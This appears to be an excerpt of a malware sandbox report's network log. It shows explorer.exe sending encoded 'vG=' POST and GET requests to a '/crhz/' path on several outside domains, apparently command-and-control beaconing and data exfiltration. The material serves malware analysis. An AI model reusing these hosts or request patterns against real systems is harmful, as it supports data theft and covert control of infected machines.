                                                    Data Ascii: vG=ezVe~MONaLxwOGiFOeOR4qnC(X5rItLQW8blHZRGFZVle3t5k4RR~laMNxEinIxBL4Z0znGEUZ7l(oVnXuV-HKJNgbsSj560~-OprDdXDmbZDXhsOUsitUVBOPlYtzaCl74Y(DPlyJhyRyZUUb42bngpCKSKUbR8f1GAPEbxLLtqrKk4ntscIzU.
                                                    Jan 30, 2023 13:41:48.772491932 CET883INHTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:41:48 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                    X-Powered-By: PHP/7.1.33
                                                    Content-Length: 195
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                    Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    27192.168.2.649749156.227.6.3080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:51.356923103 CET886OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.wylvxing.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.wylvxing.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.wylvxing.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 65 7a 56 65 7e 4d 4f 4e 61 4c 78 77 4f 6c 4b 46 43 66 4f 52 73 36 6e 44 6d 58 35 72 54 39 4c 55 57 38 58 6c 48 64 68 57 43 71 35 6c 62 30 56 35 6c 65 6c 52 75 56 61 4d 5a 42 45 75 36 34 78 58 4c 34 4d 46 7a 6a 43 55 55 66 62 6c 7e 4a 46 6e 65 4d 39 35 4a 61 4a 50 32 72 73 52 6a 35 36 68 7e 2d 66 67 72 44 4a 74 44 6d 7a 5a 44 46 4a 73 47 45 73 6c 69 30 56 42 4f 50 6c 45 74 7a 62 68 6c 37 68 46 28 47 76 31 79 63 74 79 53 54 35 55 59 59 67 31 4c 6e 67 6c 4b 71 54 36 62 4f 4e 31 58 30 54 6e 5a 33 54 56 4c 5a 52 61 6a 6f 56 38 31 4d 70 61 65 6e 38 53 4f 7a 4e 61 76 52 44 76 45 4c 53 77 37 78 6e 44 58 7a 54 77 72 4f 4c 4b 4f 32 50 6b 7a 4f 6b 67 63 31 30 71 4e 48 4a 53 64 76 33 4a 6e 73 67 67 39 64 75 70 39 55 64 45 46 48 30 35 61 61 68 34 5a 5f 53 74 66 41 6f 4b 68 65 39 36 41 4a 56 52 35 75 42 6a 45 48 39 67 54 37 77 78 66 58 54 47 58 4b 49 5f 48 31 5a 66 57 39 61 65 34 47 6d 36 4c 4f 59 5a 55 72 5a 33 69 31 35 37 51 41 4d 56 28 4a 65 76 41 5a 52 54 36 43 4c 44 31 4e 39 47 72 42 4d 73 6e 5f 4b 53 42 57 34 54 7a 55 4c 49 51 33 5a 35 71 79 77 4a 75 78 62 42 54 65 35 4d 64 45 6c 72 30 4d 6c 63 52 6b 6e 58 5a 59 6d 7a 6e 4e 35 4f 4d 7a 52 59 50 30 36 62 64 76 65 50 45 48 51 49 36 57 36 30 63 5a 37 69 58 68 71 34 51 37 28 4e 4d 6c 7a 54 54 5a 28 68 34 30 4e 6e 39 5a 6e 65 46 4f 58 7a 7a 7a 31 4b 59 52 38 64 7e 69 56 55 4e 4b 46 2d 5a 6d 4b 32 6b 4e 65 66 43 77 6e 38 4a 6b 31 68 57 55 28 67 28 35 51 6a 44 4c 53 42 78 39 51 52 34 35 57 64 73 56 47 73 39 59 31 4f 62 66 73 35 32 70 72 51 69 64 30 77 56 71 49 69 57 64 34 63 64 6f 77 57 65 7a 78 4c 28 36 70 62 55 57 61 46 67 61 7e 57 51 48 69 36 6a 7a 34 47 69 45 32 5f 55 72 65 52 41 44 56 77 71 46 53 48 62 32 79 4d 68 47 76 34 31 42 7e 75 4a 6c 39 6a 64 44 62 33 71 47 59 6d 76 32 69 46 67 69 56 62 6c 5f 7e 4b 6e 42 76 66 36 67 56 35 6b 5a 33 46 73 71 42 7a 5a 44 74 6b 39 79 56 4b 78 6e 6d 59 51 59 39 71 55 4b 50 64 51 6c 79 45 62 76 31 56 58 37 30 43 50 73 33 4f 35 73 76 4a 31 47 46 57 49 50 73 6b 45 34 76 34 76 31 64 7a 58 64 63 5a 79 5f 77 6c 6d 77 6c 79 47 6c 43 5f 32 35 6f 69 49 61 58 38 45 69 72 43 44 44 44 45 4b 4a 4c 49 33 74 6b 71 59 31 4a 5f 6b 63 6e 52 72 6a 39 7a 68 61 6d 32 43 6c 31 51 73 41 36 76 7a 5f 4b 6d 35 50 6e 4d 59 6e 30 74 4c 37 45 54 63 6d 75 37 62 59 46 53 36 2d 65 67 6b 6e 38 43 28 70 53 41 74 38 32 39 7e 6c 43 53 55 6f 55 41 4a 55 6c 45 6f 67 36 53 66 62 32 75 6b 76 65 39 70 66 38 68 75 76 75 2d 51 71 66 44 4f 39 39 37 39 70 67 62 54 6e 39 4b 68 4e 39 47 79 51 6c 35 59 46 4d 39 59 56 43 4f 52 71 65 31 6e 56 6e 34 48 43 53 35 30 74 46 47 43 79 74 66 50 47 4b 73 78 4a 49 6d 62 48 41 64 63 35 62 68 33 41 4d 59 30 61 41 35 78 39 35 6e 59 67 64 75 67 4d 36 78 66 65 34 75 50 6e 7a 71 4a 5f 72 31 42 5f 75 71 35 4f 36 6d 6f 55 68 69 53 5a 70 2d 52 31 4e 76 77 38 46 45 34 6b 79 42 71 48 73 31 71 47 39 54 4c 51 67 62 49 55 34 35 44 6d 49 46 46 4d 64 4a 66 44 72 30 47 35 64 64 53 66 74 6d 79 69 6e 4c 30 51 28 62 7a 6c 6c 39 61 72 42 33 28 6a 64 78 41 67 62 47 62 4e 44 63 6c 78 75 35 58 69 30 69 57 63 61 52 5a 7a 41 37 65 70 52 42 73 53 47 78 49 4f 74 64 52 30 63 4f 47 5f 4c 46 5a 55 4d 64 66 51 4a 38 6d 6b 7e 33 58 6b 37 32 63 63 6d 38 49 33 33 71 76 6b 46 35 39 44 6f 58 5a 5a 76 58 78 6b 54 52 77 36 6f 55 76 61 30 36 33 30 41 59 33 59 72 6d 63 6a 76 54 4b 34 46 44 39 63 39 38 74 36 50 64 6b 67 38 6e 56 66 7e 48 6a 37 69 30 62 64 4e 5a 7e 46 55 4f 32 57 59 56 56 34 74 68 6b 36 78 4a 31 7a 78 36 42 35 32 68 59 76 61 70 32 57 75 46 43 46 30 36 7e 4b 65 35 4a 32 28 70 59 30 6b 4d 69 53 28 7a 33 68 5a 6e 45 6a 53 4f 32 32 72 54 73 53 68 49 28 50 67 68 74 62 46 47 54 44 58 4a 53 77 30 41 35 4e 68 43 4b 4d 55 30 6e 46 49 78 73 6c 4f 64 33 65 28 35 33 4f 37 54 57 52 74 56 51 58 68 4c 32 54 32 30 48 46 6b 53 59 61 4a 33 62 67 28 35 69 61 35 48 48 48 4b 4c 42 65 54 69 64 6f 62 52 36 6e 44 37 75 67 73 57 28 57 69 31 4b 30 73 38 28 41 49 72 6f 54 6e 37 34 4a 61 6d 4d 5f 51 70 71 56 59 4e 79 51 46 56 6f 6e 57 43 46 4d 35 77 33 61 4c 41 62 42 6c 58 66 44 45 6f 4a 7a 65 6d 63 2d 61 63 61 6f 4a 54 6e 44 54 4c 46 37 76 35 77 71 61 47 42 56 76 4f 38 54 79 39 39 41 44 35
                                                    Data Ascii: vG=ezVe~MONaLxwOlKFCfORs6nDmX5rT9LUW8XlHdhWCq5lb0V5lelRuVaMZBEu64xXL4MFzjCUUfbl~JFneM95JaJP2rsRj56h~-fgrDJtDmzZDFJsGEsli0VBOPlEtzbhl7hF(Gv1yctyST5UYYg1LnglKqT6bON1X0TnZ3TVLZRajoV81Mpaen8SOzNavRDvELSw7xnDXzTwrOLKO2PkzOkgc10qNHJSdv3Jnsgg9dup9UdEFH05aah4Z_StfAoKhe96AJVR5uBjEH9gT7wxfXTGXKI_H1ZfW9ae4Gm6LOYZUrZ3i157QAMV(JevAZRT6CLD1N9GrBMsn_KSBW4TzULIQ3Z5qywJuxbBTe5MdElr0MlcRknXZYmznN5OMzRYP06bdvePEHQI6W60cZ7iXhq4Q7(NMlzTTZ(h40Nn9ZneFOXzzz1KYR8d~iVUNKF-ZmK2kNefCwn8Jk1hWU(g(5QjDLSBx9QR45WdsVGs9Y1Obfs52prQid0wVqIiWd4cdowWezxL(6pbUWaFga~WQHi6jz4GiE2_UreRADVwqFSHb2yMhGv41B~uJl9jdDb3qGYmv2iFgiVbl_~KnBvf6gV5kZ3FsqBzZDtk9yVKxnmYQY9qUKPdQlyEbv1VX70CPs3O5svJ1GFWIPskE4v4v1dzXdcZy_wlmwlyGlC_25oiIaX8EirCDDDEKJLI3tkqY1J_kcnRrj9zham2Cl1QsA6vz_Km5PnMYn0tL7ETcmu7bYFS6-egkn8C(pSAt829~lCSUoUAJUlEog6Sfb2ukve9pf8huvu-QqfDO9979pgbTn9KhN9GyQl5YFM9YVCORqe1nVn4HCS50tFGCytfPGKsxJImbHAdc5bh3AMY0aA5x95nYgdugM6xfe4uPnzqJ_r1B_uq5O6moUhiSZp-R1Nvw8FE4kyBqHs1qG9TLQgbIU45DmIFFMdJfDr0G5ddSftmyinL0Q(bzll9arB3(jdxAgbGbNDclxu5Xi0iWcaRZzA7epRBsSGxIOtdR0cOG_LFZUMdfQJ8mk~3Xk72ccm8I33qvkF59DoXZZvXxkTRw6oUva0630AY3YrmcjvTK4FD9c98t6Pdkg8nVf~Hj7i0bdNZ~FUO2WYVV4thk6xJ1zx6B52hYvap2WuFCF06~Ke5J2(pY0kMiS(z3hZnEjSO22rTsShI(PghtbFGTDXJSw0A5NhCKMU0nFIxslOd3e(53O7TWRtVQXhL2T20HFkSYaJ3bg(5ia5HHHKLBeTidobR6nD7ugsW(Wi1K0s8(AIroTn74JamM_QpqVYNyQFVonWCFM5w3aLAbBlXfDEoJzemc-acaoJTnDTLF7v5wqaGBVvO8Ty99AD5W4ovdsTVGDBhweCm7RbsMJqdTVcfmUcFUX4nXX5N3GIWJdu1otBe91So7pfmQrZwqPAtWrOQsoibtWRS7awb13o.
                                                    Jan 30, 2023 13:41:51.634735107 CET886INHTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:41:51 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                    X-Powered-By: PHP/7.1.33
                                                    Content-Length: 195
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                    Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    28192.168.2.649750156.227.6.3080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:55.318169117 CET887OUTGET /crhz/?vG=Tx9+97zXAbAnLmq4XNOsmb2GkF5HGNr6W72qHdNRTeliJERxp4RJ6liISWgIuo8dFog55DG7ffTMmIYpdbhnOORXqYw1ibeJvOeh5iF0aDaW&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.wylvxing.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:55.595813036 CET887INHTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:41:55 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                    X-Powered-By: PHP/7.1.33
                                                    Content-Length: 195
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                    Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    29192.168.2.649751173.230.227.17180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:00.945188999 CET888OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.popcors.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.popcors.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.popcors.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 35 45 72 4a 7e 78 37 42 52 6e 52 67 49 67 34 6f 69 51 4d 64 56 55 44 34 70 6f 30 30 56 58 48 38 38 34 64 37 28 53 79 6c 61 6b 4b 64 47 31 54 4d 45 46 69 6b 74 76 75 36 64 56 57 6a 6e 4e 68 41 61 73 55 37 64 62 43 75 62 64 43 64 6f 51 4b 6f 48 4c 72 47 39 35 44 69 42 58 74 66 7a 68 77 58 6c 61 7e 4b 6a 54 31 54 4e 33 75 72 68 31 7a 51 66 44 58 51 46 53 58 59 5a 32 28 6c 72 6e 64 34 28 68 66 75 28 5a 47 44 44 61 54 46 58 49 56 41 57 5a 4e 34 73 50 33 4a 62 7a 4f 5a 76 73 38 4f 50 47 6f 49 47 52 67 42 74 7a 4a 6c 38 4e 49 48 73 4e 4f 4e 7a 49 4d 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=5ErJ~x7BRnRgIg4oiQMdVUD4po00VXH884d7(SylakKdG1TMEFiktvu6dVWjnNhAasU7dbCubdCdoQKoHLrG95DiBXtfzhwXla~KjT1TN3urh1zQfDXQFSXYZ2(lrnd4(hfu(ZGDDaTFXIVAWZN4sP3JbzOZvs8OPGoIGRgBtzJl8NIHsNONzIM.
                                                    Jan 30, 2023 13:42:01.085072994 CET889INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:01 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.649722164.88.201.21480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:22.738095045 CET762OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.sandpiper-apts.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sandpiper-apts.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.sandpiper-apts.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 47 50 76 34 42 78 75 39 6b 78 61 45 6a 70 65 4b 71 71 54 72 4c 46 41 30 6d 79 4c 57 7e 7a 36 4a 42 30 6f 46 43 55 7a 76 50 56 53 57 67 6e 78 78 74 2d 71 62 69 35 33 30 4f 4a 62 4d 46 6e 69 70 71 5a 71 4e 54 33 74 50 51 57 4d 2d 32 30 36 54 4a 44 58 32 58 69 49 64 68 45 75 6d 4a 4d 63 53 72 5a 30 32 68 32 6d 35 6d 58 4e 69 5a 69 72 76 43 34 67 54 6d 45 55 54 28 48 71 4f 52 6b 6f 39 50 4e 66 4f 6c 50 54 55 70 31 6a 6c 33 6c 41 32 74 36 4b 74 4a 36 39 30 63 6b 58 7a 61 5f 4f 42 6c 42 76 51 56 35 4a 31 7e 4e 30 7a 6d 66 4d 35 6f 71 53 4a 28 59 59 6f 5a 50 75 54 46 70 66 43 77 75 67 62 43 34 70 6c 42 59 39 57 54 69 6a 6e 31 75 4b 53 64 52 47 75 55 77 54 6d 59 76 66 65 44 5f 4a 59 33 4b 51 5a 4a 33 66 4e 43 6d 75 2d 6a 59 4b 43 66 2d 52 78 52 36 53 50 64 4a 34 55 45 34 47 6a 53 30 62 68 63 58 41 6a 54 46 47 57 53 67 4a 4f 4b 76 50 36 41 50 41 59 4e 2d 57 6f 78 4d 79 69 61 74 4e 76 56 42 58 62 49 6f 72 5a 75 68 77 44 56 30 7a 4a 71 54 35 69 69 45 35 66 6d 33 6c 6f 33 49 7a 4e 50 41 32 6d 68 32 67 70 4a 69 43 65 31 4e 41 49 74 59 47 62 47 42 56 38 75 2d 53 69 57 6e 51 4f 33 79 54 6c 46 79 72 51 7a 57 61 48 67 45 6c 5a 6e 42 4c 79 69 78 46 4a 42 69 34 78 31 41 36 72 51 55 63 6a 46 7a 70 62 39 42 51 4c 44 70 57 6e 47 47 36 2d 79 4d 69 7a 64 36 70 6f 50 64 78 59 51 67 6a 44 43 63 68 39 42 6e 32 70 59 44 59 6e 28 6d 34 6c 76 39 37 74 61 5f 36 66 42 39 75 55 31 6e 73 4d 72 39 38 42 4d 44 47 69 6b 72 47 35 7a 38 38 64 6c 5a 34 48 76 75 64 44 4a 53 37 36 70 37 79 62 52 52 71 44 44 76 4d 59 58 71 32 5f 67 73 55 59 57 33 63 67 33 71 49 70 62 65 65 58 64 42 65 44 28 54 45 73 35 6f 4c 4a 75 7a 47 68 5a 74 49 70 71 67 49 4f 49 77 34 64 42 30 64 50 76 41 32 30 6c 44 55 62 4f 32 45 77 67 56 66 6a 61 71 33 4a 68 45 44 57 36 55 76 2d 6c 33 65 50 71 6e 4b 73 38 6e 47 66 55 78 78 74 4e 46 4b 70 38 34 77 69 73 36 6d 74 4b 63 49 46 58 31 58 46 4d 46 28 6c 78 47 28 54 57 6a 38 35 6b 30 53 51 56 4d 68 4e 42 66 58 37 77 57 45 68 6f 64 48 67 68 4c 6b 42 33 52 7a 65 55 5f 56 36 36 43 55 73 54 61 69 2d 33 5f 59 48 6c 73 59 72 4d 55 57 31 54 71 70 6e 33 46 6d 70 6c 50 30 4d 53 68 30 73 55 4d 68 51 72 70 71 75 61 6e 55 30 74 44 62 59 7e 65 4a 79 54 46 6c 6e 33 75 31 33 4b 4f 52 79 65 7a 4a 42 73 44 4c 63 70 38 47 67 61 70 68 5f 5a 30 4f 71 61 67 38 46 6d 6e 58 57 54 4c 48 4f 39 32 44 36 61 47 49 65 56 70 75 67 7e 78 78 36 46 69 4f 7a 68 44 70 5a 73 56 33 4f 52 31 7a 58 64 65 7e 4f 67 72 34 69 58 61 71 63 28 4c 56 59 37 76 71 5f 53 35 50 44 6e 36 79 5f 51 52 32 63 34 73 59 55 4a 48 28 6a 4c 53 79 31 78 5a 6f 34 36 77 6b 43 6f 37 38 34 4b 63 7a 75 6c 65 6d 59 5a 38 4d 6c 36 46 37 41 39 66 70 78 7a 57 48 79 59 4b 66 73 47 58 46 66 32 33 43 52 67 6e 77 46 35 41 42 49 72 4a 31 41 7a 7a 33 46 63 59 65 70 6f 62 6a 58 44 57 59 53 7a 4a 39 72 70 66 31 34 66 69 32 45 73 79 43 54 7e 6d 70 65 53 38 37 53 4e 7a 44 34 57 47 30 44 71 6c 56 43 32 79 68 42 42 35 77 75 55 47 7e 73 66 38 58 35 6b 4a 34 5a 4f 2d 4a 38 61 4c 57 4e 54 64 74 55 76 42 46 44 70 5a 58 6f 77 5a 41 76 68 50 72 77 33 69 79 73 56 36 72 48 69 70 58 41 39 74 4e 4b 4f 63 43 4a 75 4a 58 44 76 41 51 72 4e 4c 53 7a 61 37 70 72 65 57 70 6e 48 48 7e 7a 6d 46 4a 66 71 33 4b 44 49 50 5a 6d 30 6a 65 30 68 49 72 50 4a 53 64 38 78 2d 76 41 6a 32 50 52 6c 6d 47 78 51 30 63 46 67 35 37 4f 34 39 6c 74 63 43 36 79 62 31 58 51 54 47 57 51 54 52 6e 77 6d 59 67 77 72 70 52 78 66 68 44 57 59 62 65 2d 38 58 65 51 41 45 75 47 41 36 4f 70 43 48 47 5f 4a 36 6c 46 53 64 45 41 28 50 7e 38 4b 79 58 43 44 45 53 4b 31 34 53 55 35 78 70 6e 45 38 71 44 74 38 7e 68 4e 6e 48 52 5a 51 31 69 6d 4d 6c 59 4e 56 28 54 42 68 44 43 51 33 6e 5f 68 77 34 61 4b 35 31 43 65 4f 78 72 54 53 70 69 32 41 75 64 58 66 6d 35 38 49 70 6e 36 56 68 6e 4d 64 6a 77 73 67 56 46 55 39 6b 51 76 47 75 6b 70 67 38 33 64 74 37 47 69 5a 34 6c 39 57 4d 42 43 77 79 65 66 4a 75 43 41 62 79 59 70 55 30 54 52 46 56 56 66 34 70 58 34 4f 69 68 57 75 70 5a 62 42 53 36 66 5f 38 34 46 4a 34 33 6c 6a 51 63 62 6e 47 39 39 38 28 62 4f 4c 31 2d 34 34 74 61 65 64 48 42 37 57 7e 35 6b 42 42 54 70 59 6f 69 32 53 54 39 5a 58 7e 65 64 4b 55 68 6e 75 50 43 43 57 44 50
                                                    Data Ascii: vG=GPv4Bxu9kxaEjpeKqqTrLFA0myLW~z6JB0oFCUzvPVSWgnxxt-qbi530OJbMFnipqZqNT3tPQWM-206TJDX2XiIdhEumJMcSrZ02h2m5mXNiZirvC4gTmEUT(HqORko9PNfOlPTUp1jl3lA2t6KtJ690ckXza_OBlBvQV5J1~N0zmfM5oqSJ(YYoZPuTFpfCwugbC4plBY9WTijn1uKSdRGuUwTmYvfeD_JY3KQZJ3fNCmu-jYKCf-RxR6SPdJ4UE4GjS0bhcXAjTFGWSgJOKvP6APAYN-WoxMyiatNvVBXbIorZuhwDV0zJqT5iiE5fm3lo3IzNPA2mh2gpJiCe1NAItYGbGBV8u-SiWnQO3yTlFyrQzWaHgElZnBLyixFJBi4x1A6rQUcjFzpb9BQLDpWnGG6-yMizd6poPdxYQgjDCch9Bn2pYDYn(m4lv97ta_6fB9uU1nsMr98BMDGikrG5z88dlZ4HvudDJS76p7ybRRqDDvMYXq2_gsUYW3cg3qIpbeeXdBeD(TEs5oLJuzGhZtIpqgIOIw4dB0dPvA20lDUbO2EwgVfjaq3JhEDW6Uv-l3ePqnKs8nGfUxxtNFKp84wis6mtKcIFX1XFMF(lxG(TWj85k0SQVMhNBfX7wWEhodHghLkB3RzeU_V66CUsTai-3_YHlsYrMUW1Tqpn3FmplP0MSh0sUMhQrpquanU0tDbY~eJyTFln3u13KORyezJBsDLcp8Ggaph_Z0Oqag8FmnXWTLHO92D6aGIeVpug~xx6FiOzhDpZsV3OR1zXde~Ogr4iXaqc(LVY7vq_S5PDn6y_QR2c4sYUJH(jLSy1xZo46wkCo784KczulemYZ8Ml6F7A9fpxzWHyYKfsGXFf23CRgnwF5ABIrJ1Azz3FcYepobjXDWYSzJ9rpf14fi2EsyCT~mpeS87SNzD4WG0DqlVC2yhBB5wuUG~sf8X5kJ4ZO-J8aLWNTdtUvBFDpZXowZAvhPrw3iysV6rHipXA9tNKOcCJuJXDvAQrNLSza7preWpnHH~zmFJfq3KDIPZm0je0hIrPJSd8x-vAj2PRlmGxQ0cFg57O49ltcC6yb1XQTGWQTRnwmYgwrpRxfhDWYbe-8XeQAEuGA6OpCHG_J6lFSdEA(P~8KyXCDESK14SU5xpnE8qDt8~hNnHRZQ1imMlYNV(TBhDCQ3n_hw4aK51CeOxrTSpi2AudXfm58Ipn6VhnMdjwsgVFU9kQvGukpg83dt7GiZ4l9WMBCwyefJuCAbyYpU0TRFVVf4pX4OihWupZbBS6f_84FJ43ljQcbnG998(bOL1-44taedHB7W~5kBBTpYoi2ST9ZX~edKUhnuPCCWDPge(C0a1GfyX-Nx1ehQy_Z1v25-yYM_eIyu8mYjRfX5AhlhzAia9FlEjNHCmL03kFZPgzLPrSz0O4f7qp9uS0y5M.
                                                    Jan 30, 2023 13:40:22.946933031 CET768INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 30 Jan 2023 12:40:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
